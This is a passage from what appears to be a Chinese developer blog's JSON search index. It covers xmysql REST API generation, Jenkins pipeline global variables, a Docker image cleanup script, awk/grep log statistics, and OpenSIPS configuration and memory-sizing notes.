应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?_ids=1,2,3 DELETE :fire: /api/tableName/bulk Deletes multiple rows - /api/tableName/bulk?_ids=1,2,3 GET /api/tableName/:id Retrieves a row by primary key PATCH /api/tableName/:id Updates row element by primary key DELETE /api/tableName/:id Delete a row by primary key GET /api/tableName/findOne Works as list but gets single record matching criteria GET /api/tableName/count Count number of rows in a table GET /api/tableName/distinct Distinct row(s) in table - /api/tableName/distinct?_fields=col1 GET /api/tableName/:id/exists True or false whether a row exists or not GET /api/parentTable/:id/childTable Get list of child table rows with parent table foreign key GET :fire: /api/tableName/aggregate Aggregate results of numeric column(s) GET :fire: /api/tableName/groupby Group by results of column(s) GET :fire: /api/tableName/ugroupby Multiple group by results using one call GET :fire: /api/tableName/chart Numeric column distribution based on (min,max,step) or(step array) or (automagic) GET :fire: /api/tableName/autochart Same as Chart but identifies which are numeric column automatically - gift for lazy while prototyping GET :fire: /api/xjoin handles join GET :fire: /dynamic execute dynamic mysql statements with params GET :fire: /upload upload single file GET :fire: /uploads upload multiple files GET :fire: /download download a file GET /api/tableName/describe describe each table for its columns GET /api/tables get all tables in database 3 更多资料 项目地址:https://github.com/o1lab/xmysql ","permalink":"https://wdd.js.org/posts/2019/08/vv5oro/","summary":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysqlxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?","title":"xmysql 一行命令从任何mysql数据库生成REST API"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)Some methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.However any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.A set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISION As an example of loading variable values from Groovy: mail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:properties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/08/tdeab2/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是被慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有写镜像虽然镜像名不同,但是镜像 ID 都是相同的,这是后往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less then max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G. when current free disk less then max free disk, remove docker images current_free_disk=`df -lh | grep centos-root | awk \u0026#39;{print strtonum($4)}\u0026#39;` df -lh echo \u0026#34;max_free_disk: $max_free_disk G\u0026#34; echo -e \u0026#34;current_free_disk: ${GREEN} $current_free_disk G ${NC}\u0026#34; if [ $current_free_disk -lt $max_free_disk ] then echo -e \u0026#34;${RED} need to clean up docker images ${NC}\u0026#34; docker images | grep none | awk \u0026#39;{print $3 }\u0026#39; | xargs docker rmi docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi else echo -e \u0026#34;${GREEN}no need clean${NC}\u0026#34; fi 注意事项 为了加快打包的速度,一般不要太频繁的删除镜像。因为老的镜像中的某些不改变的层,可以作为新的镜像的缓存,从而大大加快构建的速度。\n","permalink":"https://wdd.js.org/shell/docker-clean-tips/","summary":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是被慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep \u0026#34;Exited\u0026#34; | awk \u0026#39;{print $1 }\u0026#39; | xargs docker rm 批量删除带有 none 字段的镜像 $3 一般就是取出每一行的镜像 id 字段\n# 方案1: 根据镜像id删除镜像 docker images| grep none |awk \u0026#39;{print $3 }\u0026#39;|xargs docker rmi # 方案2: 根据镜像名删除镜像 docker images | grep wecloud | awk \u0026#39;{print $1\u0026#34;:\u0026#34;$2}\u0026#39; | xargs docker rmi 方案 1,根据镜像 ID 删除镜像时,有写镜像虽然镜像名不同,但是镜像 ID 都是相同的,这是后往往会删除失败。所以根据镜像名删除镜像的效果会更好。\n删除镜像定时任务脚本 #!/bin/bash # create by wangduanduan # when current free disk less then max free disk, you can remove docker images # GREEN=\u0026#39;\\033[0;32m\u0026#39; RED=\u0026#39;\\033[0;31m\u0026#39; NC=\u0026#39;\\033[0m\u0026#39; max_free_disk=5 # 5G.","title":"Docker镜像批量清理脚本"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序是,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/log-ana/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","permalink":"https://wdd.js.org/opensips/ch5/condition/","summary":"if语句中的真和假值 假值\n负数: -1, -2, -3, -4 null: hdr(not_exist) 然而这个not_exist头并不存在 \u0026ldquo;\u0026rdquo;: 空字符串 0 真值:\n非空字符串: \u0026ldquo;acb\u0026rdquo; 正数: 1,2,3 ","title":"条件语句特点"},{"content":" 将opensips.cfg文件中的,log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","permalink":"https://wdd.js.org/opensips/ch7/without-log/","summary":" 将opensips.cfg文件中的,log_stderror的值改为yes, 让出错直接输出到标准错误流上,然后opensips start 如果第一步还是没有日志输出,则opensips -f opensips.cfg ","title":"opensips启动失败没有任何报错日志"},{"content":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。\n","permalink":"https://wdd.js.org/posts/2019/08/ym77uc/","summary":"虚拟化 问题:\n操作系统如何虚拟化? 虚拟化有什么好处? 操作系统向下控制硬件,向上提供API给应用程序调用。 系统的资源是有限的,应用程序都需要资源才能正常运行,所以操作系统也要负责资源的分配和协调。通常计算机有以下的资源。\ncpu 内存 磁盘 网络 有些资源可以轮流使用,而有些资源只能被独占使用。","title":"【笔记】操作系统:虚拟化 并发 持久化"},{"content":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否者只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","permalink":"https://wdd.js.org/posts/2019/08/vqergg/","summary":" 处理问题的关键在于收集数据,基于数据找出触发条件。\n1. 处理步骤 收集信息并记录:包括日志,截图,抓包,客户反馈等等。注意:原始数据非常重要,如果不记录下来,有可能再也无法去重现。 分析数据:注意:分析数据不要有提前的结果倾向,否者只会找有利于该倾向的证据。 给出报告和建议,以及解决方案,并记录存档 2. 概率维度 问题出现的概率,是一个非常重要的指标,需要提前明确\n必然出现:在某个条件下,问题必然出现 注意:必然出现的问题,也可能是小范围内的必然,放到大范围内,就不是必然出现。 偶然出现:问题出现有一定的概率性 注意:问题偶然出现也并不一定说明问题是偶然的,有可能因为没有找到唯一确定的触发条件,导致问题看起来是偶然的。 3. 特征维度 时间特征:集中于某一段时间产生 地理特征:集中于某一片区域产生 人群特征:集中于某几个人产生 设备特征:集中于某些电脑或者客户端 ","title":"问题排查方法论"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.\n内存太小会导致OOM, 内存大大有会浪费\nUnfortunately picking this limit is not something that can be easily determined by a magic formula. The reason is that memory consumption is often influenced by a lot of external factors, like calling scenarios, traffic patterns, provisioned data, interactions with other external components (like AAA or DB servers), etc. Therefore, the only way to properly dimension the memory OpenSIPS is allowed to use is by monitoring memory usage, understanding the memory footprint and tuning this value accordingly. This article provides a few tips to achieve this goal.\n首先监控opensips的内存使用,然后根据监控的值调整合适的内存大小\nOpenSIPS内部的内存使用 opensips是个多进程程序并使用两种内存模型\n私有内存: 进程独占的内存,往往比较小 共享内存: opensips模块使用的内存,往往比较大 To understand the way OpenSIPS uses the available memory, we have to point out that OpenSIPS is a multi-process application that uses two types of memory: private and shared. Each process has its own private memory space and uses it to store local data, that does not need to be shared with other processes (i.e. parsing data). Most of the time the amount of private memory used is small, and usually fits into the default value of 2MB per process. Nevertheless understanding the way private memory is used is also necessary in order to properly dimension your platform’s memory.On the other hand, shared memory is a big memory pool that is shared among all processes. This is the memory used by OpenSIPS modules to store data used at run-time, and in most of the cases, the default value of 16MB is not enough. As I stated earlier, it is impossible to pick a “magic” value for this limit, mostly because there are a lot of considerations that affect it. The data stored in the shared memory can be classified in two categories:\n流量数据:1. 注册相关的数据;2. 呼叫相关的数据,tm和daillog 临时数据:数据库缓存数据\nTraffic data – data generated by your customers registration data, managed by the usrloc module, is directly linked to the number of customers registered into the platform; call data, managed by the tm and dialog modules, is related to the number of simultaneous calls done through the platform. Provisioning data – data cached from the database, used to implement the platform’s logic. The amount of memory used by each of this data may vary according to the services you offer, your customer base and their traffic.\n监控内存使用 有两种方式监控内存\nOpensips CP,这个工具比较方便,但是安装比较负载,一般不使用 通过opensips的fifo指令去获取内存。这个比较方便,可以做成crontab, 然后周期性的写入到influxdb。 There are two ways to monitor OpenSIPS memory statistics:\nfrom OpenSIPS CP Web GUI, using the statistics interface (Image 1) from cli using the opensipsctl tool: opensipsctl fifo get_statistics shmem: shmem:total_size:: 268435456 shmem:used_size:: 124220488 shmem:real_used_size:: 170203488 shmem:max_used_size:: 196065104 shmem:free_size:: 98231968 shmem:fragments:: 474863 From both you can observe 6 values:\ntotal_size: the total amount of memory provisioned used_size: the amount of memory required to store the data real_used_size: the total amount of memory required to store data and metadata max_used_size: the maximum amount of memory used since OpenSIPS started free_size: the amount of free memory fragments: the number of fragments When monitoring memory usage, the most important statistics are the max_used_size , because it indicates the minimum value OpenSIPS needs to support the traffic that has been so far and the real_used_size, because it indicates the memory used at a specific moment. We will use these metrics further on.\n理解内存使用 In order to have a better understanding about the memory used, we will take as an example a very specific platform: an outbound PSTN gateway, that is designed to support 500 CPS (calls per second) from customers and dispatch them to approximately 100K prefixes, cached by the drouting module. You can see the platform’s topology in this picture:\nTo figure out what happens in the scenario Image 1 presents, we will extract the real_used_size, max_used_size and actve_dialogs statistics:\nAs you can observe, at the beginning of the chart, the memory usage was low, close to 0. That is most likely OpenSIPS startup. Then, it grows quickly until around 60MB. That is OpenSIPS loading the 100K of prefixes into the drouting module cache. Next, as we can see in the **active_dialogs **statistic, traffic comes in in batches. Therefore OpenSIPS memory usage increases gradually, until around 170MB and stabilizes with the call-flow. After a while, the dialog numbers start to decrease, and the memory is again gradually released, until it ends to the idle memory of 60MB used by the drouting cache.Taking a closer look at the charts, you will notice two awkward things in the second half of the period:\ndialog占用的内存并不是呼叫结束后立即释放,而是由计时器去延时周期性的按批次去释放 SIP事务也不是会麻烦释放,而是会等待去耗尽网络中所有的重传消息\nopensips的很多模块往往需要一次性的把数据库中的数据加载到内存中。而在模块reload的时候,内存中会同时存在两份数据。直到新的数据完全加载完毕后,老的数据占用的内存才会释放,而在此之前,老的数据仍旧驻留在内存中,用来处理呼叫。所以在模块reload的时候,也是往往内存出现峰值的时候。 老的数据被释放之后,峰值会很快回落。\nEven though dialogs become significantly less, shared memory usage is still high. That is because dialogs are not immediately deleted from OpenSIPS memory, but on a timer job that deletes them in bulk batches from the database(increased DB performance). Also, SIP transactions are not deleted immediately after they complete, but stored for a while to absorb re-transmissions (according to RFC 3261 requirements). Even if there are no high amounts of dialogs coming in, there is a big spike of memory usage, which also changes the max_used_size statistic. The reason for this spike is a drouting module cache reload, over the MI (Management Interface): opensipsctl fifo dr_reload The reason for this spike is that during cache reload, OpenSIPS stores in memory two sets of data: the old one and the new one. The old set is used to route calls until the new set is fully loaded. After that, the memory for the old set is released, and the new set is used further on. Although this algorithm is used to increase the routing performance, it requires a large amount of memory during reload, usually doubling the memory used for provisioning.Following the article till now, you would say that looking at the memory statistics and correlating traffic with memory usage can be fairly easy to understand how OpenSIPS** **uses memory and what are the components that use more. Unfortunately that is not always true, because sometime you might not have the entire history of the events, or the events happen simultaneously, and you can not figure out why. Therefore you might end up in a situation where you are using large amount of memory, but can point out why. This makes scaling rather impossible (for both customers and provisioning rules), because you will not be able to estimate how components spread the memory among them. That is why in OpenSIPS 2.2 we added a more granular memory support, that allows you to view the memory used by each module (or group of modules). Memory usage in OpenSIPS 2.2 In order to enable granular memory support, you need to follow these steps:\ngenerate statistics files by running: # make generate-mem-stats 2\u0026gt; /dev/null compile OpenSIPS with extra shared memory support, by running: # make menuconfig -\u0026gt; Configure compile options -\u0026gt; \u0026lt;br /\u0026gt; Configure compile flags -\u0026gt; SHM_EXTRA_STATS\u0026lt;br /\u0026gt;# make all configure the groups in OpenSIPS configuration file: mem-group = \u0026#34;traffic\u0026#34;: \u0026#34;tm\u0026#34; \u0026#34;dialog\u0026#34; mem-group = \u0026#34;provision\u0026#34;: 